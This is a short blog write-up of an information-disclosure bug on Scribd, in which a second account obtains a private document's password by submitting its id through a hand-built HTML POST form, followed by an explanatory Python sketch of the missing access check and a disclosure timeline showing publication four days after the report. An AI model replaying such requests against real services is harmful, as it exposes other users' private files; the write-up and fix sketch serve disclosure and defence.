How I Found Information Disclosure on Scribd.com

Zerb0a
Nov 22, 2018 · 2 min read

Hi, this is my first write-up on medium.com.
11 days ago I found a vulnerability on scribd.com while I was looking for an answer to my homework (I was lazy at that time).

Then I made a document and made the document private.

In my heart I thought that the download button made me curious, so I decided to intercept the request before pressing the download button, and I found a request with the POST method to the URL: https://www.scribd.com/document_downloads/request_document_for_download

Then I would make a document, give the document a password (make it private) and try to get access from another account. After that I created a new account and made a CSRF whose contents were more or less like this:

<html>
<title>Scribd Vulnerability</title>
<body>
<form action="https://www.scribd.com/document_downloads/request_document_for_download" method="POST">
<input type="hidden" name="id" value="(ID FILE)" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

And I tried to do pentesting.

Bingo! After that I managed to get the password to see the private document. After that I asked the Scribd IT security team whether there was a bug bounty program or not. After 11 days (when I wrote this) I immediately reported this bug to the Scribd team so that it could be fixed.
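
The result described above, a second account receiving the view password of a private document just by supplying its id, is what a missing per-object access check on the server looks like. The sketch below is an added example, not code from the original post or from Scribd: the data model, function names and sample values are assumptions constructed for illustration, showing the unchecked behaviour next to a handler that checks the session user's rights to the document before returning anything.

```python
# Added illustration: hypothetical in-memory model, not Scribd's code.
from dataclasses import dataclass, field
from typing import Optional

@dataclass
class Document:
    doc_id: int
    owner: str
    private: bool
    password: Optional[str] = None            # view password for private docs
    shared_with: set = field(default_factory=set)

# Constructed sample data.
DOCS = {
    101: Document(101, "alice", private=True, password="constructed-secret"),
    102: Document(102, "alice", private=False),
}

class NotFound(Exception):
    """Returned for both unknown ids and ids the caller may not access."""

def request_download_unchecked(session_user: str, doc_id: int) -> dict:
    # Behaviour matching the write-up: the id alone selects the document,
    # and the response carries the view password for any logged-in caller.
    doc = DOCS.get(doc_id)
    if doc is None:
        raise NotFound(doc_id)
    return {"id": doc.doc_id, "password": doc.password}

def can_view(session_user: str, doc: Document) -> bool:
    return (not doc.private) or session_user == doc.owner \
        or session_user in doc.shared_with

def request_download_checked(session_user: str, doc_id: int) -> dict:
    # session_user must come from the server-side session, never the form.
    doc = DOCS.get(doc_id)
    # Same error for "missing" and "not yours", so ids cannot be probed.
    if doc is None or not can_view(session_user, doc):
        raise NotFound(doc_id)
    response = {"id": doc.doc_id}
    if session_user == doc.owner:             # secret only goes to the owner
        response["password"] = doc.password
    return response
```

A regression test for an endpoint like this should always include a second, unrelated account requesting the first account's private object id.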

Full video PoC on my blog:
https://raflipasya19.blogspot.co.id
My YouTube channel:
T-GOX Channel

Status:

  • 19 November 2018 16:59 PM = Reported to Scribd Security Team
  • 20 November 2018 01:58 AM = Their team reviewed my report
  • No response after 4 days, so I decided to write up this issue
